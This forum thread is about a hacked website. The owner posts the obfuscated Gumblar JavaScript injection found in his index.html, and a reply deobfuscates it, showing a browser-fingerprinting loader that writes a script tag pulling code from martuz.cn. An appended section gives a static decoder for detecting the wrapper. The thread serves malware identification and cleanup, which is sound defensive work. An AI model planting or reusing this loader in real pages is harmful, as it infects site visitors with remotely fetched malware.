
What does this java script do?



#1 PSSMike


Posted 19 May 2009 - 09:55 PM

My web site was hacked into and this script was added to my Index.html file in the HEAD section.

My hosting provider's tech support tell me it is some sort of Badware???? They sent me to this site http://www.stopbadware.org/home/security

I have the offending code removed.

Can anyone tell me what this code does?


script language=javascript><!--
(function(){var YkjaF='%';var nxcZ='var<20a<3d<22<53cr<69<70tE<6e<67in<65<22<2cb<3d<22Ver<73<69on()<2b<22<2cj<3d<22<22<2cu<3dna<76<69ga<74<6f<72<2eus<65rA<67en<74<3bif(<28u<2e<69ndexOf(<22<43hr<6fm<65<22)<3c0)<26<26(u<2ein<64ex<4ff(<22Win<22)<3e0)<26<26(u<2ei<6e<64e<78Of(<22<4eT<206<22)<3c<30)<26<26<28d<6f<63um<65n<74<2eco<6f<6bie<2eindexOf(<22miek<3d<31<22)<3c0)<26<26(typ<65<6ff(<7ar<76z<74s)<21<3dtype<6ff(<22A<22<29))<7bzr<76zts<3d<22<41<22<3b<65va<6c(<22if(windo<77<2e<22+a+<22)j<3d<6a+<22+<61+<22Maj<6fr<22+b+a+<22M<69n<6fr<22+b+a+<22Bu<69ld<22+b+<22j<3b<22)<3bd<6fcum<65nt<2ew<72it<65(<22<3cscri<70t<20sr<63<3d<2f<2fmart<75<22+<22<7a<2ecn<2f<76id<2f<3fid<3d<22<2b<6a+<22<3e<3c<5c<2f<73c<72<69pt<3e<22)<3b<7d';var Rrf3=nxcZ.replace(/</g,YkjaF);eval(unescape(Rrf3))})();
--></script


Thanks



#2 Minh Triet Pham Tran


Posted 07 January 2012 - 04:13 PM

Here is the deobfuscated JavaScript code:
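var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
// Run only for Windows user agents that are not Chrome and not "NT 6", that have no
// miek=1 cookie, and only once per page (the zrvzts global is the guard).
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A")))
{
  zrvzts="A";
  // If window.ScriptEngine exists, set j to ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j.
  eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
  // Write a script tag that loads //martuz.cn/vid/?id=<j>; the host name is split across two literals.
  document.write("<script src=//martu"+"z.cn/vid/?id="+j+"><\/script>");
}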

This is a Gumblar injection attack. You can read further information at the following links:
Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New? | Unmask Parasites. Blog.
http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/

Trend Micro: Security Database (Threat Encyclopedia)
http://about-threats.trendmicro.com/ArchiveMalware.aspx?language=jp&name=JS_GUMBLAR.ERK

AhnLab - Comprehensive network security solutions provider | The network security expert by your side
http://www.ahn.com.cn/global/pressroom_view.ESD?fmethod=view&press_seq=1403&printNum=2

martuz.cn -(95.129.145.58)
http://www.malwaredomainlist.com/forums/index.php?topic=2892.0
If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology. — Bruce Schneier
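
Added example, not part of either post above: a static decoder for the wrapper shown in post #1 (a marker character swapped for `%`, then `unescape`, then `eval`), which recovers the inner script as text without running it and lists the hosts its injected script tags point to. The sample input is constructed for this example, `example.invalid` is a placeholder host, and the function names are assumptions.

```javascript
// Added example: static decode of the "<XX" wrapper; nothing here is eval'd.
// SAMPLE_HTML is constructed for this example; example.invalid is a placeholder host.
const INNER = 'document.write("<script src=//exam"+"ple.invalid/vid/?id="+j+"><\\/script>");';
const encode = (js) => // builds the constructed sample only
  js.replace(/[^A-Za-z0-9]/g, (c) => "<" + c.charCodeAt(0).toString(16).padStart(2, "0"));
const SAMPLE_HTML =
  "<script>(function(){var k='%';var p='" + encode(INNER) +
  "';var r=p.replace(/</g,k);eval(unescape(r))})();</" + "script>";

// Locate: var K='%'; var P='...'; ... P.replace(/<marker>/g,K); eval(unescape(
function findWrapper(html) {
  const re = /var\s+(\w+)='%';\s*var\s+(\w+)='([^']*)';[\s\S]*?\2\.replace\(\/(.)\/g,\1\);\s*eval\(unescape\(/;
  const m = re.exec(html);
  return m ? { payload: m[3], marker: m[4] } : null;
}

// Undo replace(marker -> '%') + unescape() by decoding marker + 2 hex digits as text.
function decodePayload(payload, marker) {
  const esc = marker.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  return payload.replace(new RegExp(esc + "([0-9a-fA-F]{2})", "g"),
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Heuristic: merge "a"+"b" literals so a host name split across literals becomes visible.
function foldLiterals(js) {
  let prev;
  do {
    prev = js;
    js = js.replace(/"([^"\\]*)"\s*\+\s*"([^"\\]*)"/g, '"$1$2"');
  } while (js !== prev);
  return js;
}

// Hosts referenced by <script src=...> tags that the decoded layer writes into the page.
function scriptHosts(js) {
  const hosts = new Set();
  for (const m of foldLiterals(js).matchAll(/<script\s+src=(?:https?:)?\/\/([a-z0-9.-]+)/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts];
}

// Full pass over one HTML file: null when the wrapper is absent.
function analyze(html) {
  const w = findWrapper(html);
  if (!w) return null;
  const decoded = decodePayload(w.payload, w.marker);
  return { decoded, hosts: scriptHosts(decoded) };
}
```

Running `analyze` over every HTML and JS file in a web root flags pages that still carry the wrapper and gives the hosts to look for in proxy or DNS logs.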



